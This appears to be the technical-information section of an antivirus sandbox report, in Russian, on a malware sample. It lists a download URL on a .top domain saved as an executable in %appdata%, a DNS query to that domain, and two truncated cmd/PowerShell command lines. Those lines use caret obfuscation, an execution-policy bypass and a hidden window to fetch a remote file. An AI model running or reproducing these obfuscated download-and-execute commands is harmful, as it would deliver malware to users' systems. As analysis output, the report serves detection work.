Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOWERsHE^l^l^.EXe -eXeCuTI^On^PO^l^icY bY^Pa^ss^ ^-n^oP^R^OFil^E^ ^-^w^I^N^Do^w^S^ty^l^E HiD^DEN^ ^(new^-OBject s^ys^t^eM.^n^eT^.WebclI^E^NT^).d^O^Wnload^F^iL^E('http://www.dooraso...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "pOWERsHE^l^l^.EXe -eXeCuTI^On^PO^l^icY bY^Pa^ss^ ^-n^oP^R^OFil^E^ ^-^w^I^N^Do^w^S^ty^l^E HiD^DEN^ ^(new^-OBject s^ys^t^eM.^n^eT^.WebclI^E^NT^).d^O^Wnload^F^iL^E('http://www.dooraso...' (со скрытым окном)